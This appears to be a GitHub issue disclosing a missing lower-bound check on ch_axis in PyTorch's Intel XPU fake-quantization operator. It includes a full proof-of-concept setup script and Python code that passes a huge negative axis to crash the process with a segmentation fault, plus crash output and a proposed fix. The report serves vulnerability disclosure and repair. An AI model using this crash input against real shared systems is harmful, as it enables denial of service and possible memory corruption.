Skip to content

Bound check in fused_moving_avg_obs_fake_quant_xpu #3963

@chuanqi129

Description

@chuanqi129

The Intel XPU implementation of fused_moving_avg_obs_fake_quant_xpu validates only the upper bound of ch_axis:

TORCH_CHECK(
    ch_axis < x.dim(),
    "Error in fused_moving_avg_obs_fq_helper: ch_axis must be < "
    "self.dim()");

However, in the per_row_fq path, the same value is later used as an index into a native DimVector:

auto res = DimVector(x.sizes());
std::iota(res.begin(), res.end(), 0);
res[ch_axis] = 0;
res[0] = ch_axis;

y = x.permute(res);

There is no lower-bound validation such as:

ch_axis >= 0

or canonicalization through a dimension-wrapping helper such as maybe_wrap_dim.

A large negative ch_axis therefore passes the explicit check (ch_axis < x.dim()) and reaches native C++ code in the XPU backend. In testing, this causes a deterministic segmentation fault in libtorch_xpu.so.

This is reachable from public Python APIs in the Intel XPU PyTorch wheel.

Proof of Concept

The following commands create a clean virtual environment, install the Intel XPU PyTorch wheel, write the PoC from the terminal, and run it.

set -euo pipefail

mkdir -p ~/intel-xpu-research
python3 -m venv ~/venvs/torch-xpu-wheel
source ~/venvs/torch-xpu-wheel/bin/activate

python -m pip install --upgrade pip setuptools wheel

# Install PyTorch / torchvision / torchaudio XPU wheels.
pip install torch torchvision torchaudio --index-url https://download.pytorch.org/whl/xpu

# Optional sanity check: verify that the Intel XPU backend is visible.
python - <<'PY'
import torch
print("torch:", torch.__version__)
print("xpu available:", torch.xpu.is_available())
if torch.xpu.is_available():
    print("xpu device:", torch.xpu.get_device_name(0))
PY

# Write the PoC from the terminal.
cat > ~/intel-xpu-research/poc_fused_obs_xpu_huge_negative.py <<'PY'
import os
import torch

print("torch:", torch.__version__, flush=True)
print("torch file:", torch.__file__, flush=True)
print("xpu available:", torch.xpu.is_available(), flush=True)
print("xpu device:", torch.xpu.get_device_name(0), flush=True)
print("LD_LIBRARY_PATH:", os.environ.get("LD_LIBRARY_PATH", ""), flush=True)

device = "xpu"

x = torch.full((1,), 0.5, device=device, dtype=torch.float64)
observer_on = torch.full((1,), 1, device=device, dtype=torch.int32)
fake_quant_on = torch.full((1,), 1, device=device, dtype=torch.int64)
running_min = torch.full((1,), 0.5, device=device, dtype=torch.float64)
running_max = torch.full((1,), 0.5, device=device, dtype=torch.float64)
scale = torch.full((1,), 0.5, device=device, dtype=torch.float64)
zero_point = torch.full((1,), 0.5, device=device, dtype=torch.float64)

print("calling public torch.fused_moving_avg_obs_fake_quant", flush=True)

out = torch.fused_moving_avg_obs_fake_quant(
    x,
    observer_on,
    fake_quant_on,
    running_min,
    running_max,
    scale,
    zero_point,
    0.0,
    0,
    0,
    -1250999896764,
    True,
    True,
)

torch.xpu.synchronize()
print("returned:", out, flush=True)
PY

# Run the PoC with a clean dynamic-library environment.
env -u LD_LIBRARY_PATH -u LD_PRELOAD -u SYCL_PI_TRACE \
PYTHONFAULTHANDLER=1 \
TORCH_SHOW_CPP_STACKTRACES=1 \
TORCH_DISABLE_ADDR2LINE=1 \
MALLOC_CHECK_=3 \
MALLOC_PERTURB_=165 \
ONEAPI_DEVICE_SELECTOR=level_zero:gpu \
python ~/intel-xpu-research/poc_fused_obs_xpu_huge_negative.py

echo "exit code: $?"

The process crashes with a segmentation fault:

torch: 2.9.1+xpu
xpu available: True
xpu device: Intel(R) Graphics [0x7d67]
LD_LIBRARY_PATH:

Fatal Python error: Segmentation fault

Current thread ... [python] (most recent call first):
  File ".../poc_fused_obs_fake_quant_xpu_fuzz_axes.py", line 19 in run_case
  File ".../poc_fused_obs_fake_quant_xpu_fuzz_axes.py", line 103 in <module>

Current thread's C stack trace:
  ...
  Binary file ".../torch/lib/libtorch_xpu.so", at +0x616d2df
  Binary file ".../torch/lib/libtorch_xpu.so", at +0x62043f7
  Binary file ".../torch/lib/libtorch_xpu.so", at +0x6204491
  Binary file ".../torch/lib/libtorch_cpu.so", at at::_ops::_fused_moving_avg_obs_fq_helper::redispatch(...)
  Binary file ".../torch/lib/libtorch_cpu.so", at at::_ops::_fused_moving_avg_obs_fq_helper::call(...)
  ...

Segmentation fault
exit code: 139

The same crash was also reproduced through the helper-path operator with:

torch._fused_moving_avg_obs_fq_helper(..., ch_axis=-1250999896764, per_row_fake_quant=True, symmetric_quant=False)

and through the public operator with:

torch.fused_moving_avg_obs_fake_quant(..., ch_axis=-1250999896764, per_row_fake_quant=True, symmetric_quant=True)

Both crashed with exit code 139 and stack frames in libtorch_xpu.so.

Impact

A caller who can execute PyTorch code in a process using the Intel XPU backend can crash the process by passing a crafted negative ch_axis to the public fake-quantization operator.

Impact:

Native segmentation fault in libtorch_xpu.so
Process termination / denial of service
Potential memory corruption due to unchecked native indexing
Affects public Python API usage, not only internal C++ calls

Recommended solution

Add explicit lower-bound validation or canonicalization for ch_axis before it is used.

For example:

TORCH_CHECK(
    ch_axis >= 0 && ch_axis < x.dim(),
    "Error in fused_moving_avg_obs_fq_helper: ch_axis must be >= 0 and < self.dim()");

Metadata

Metadata

Labels

No labels
No labels

Type

No type
No fields configured for issues without a type.

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions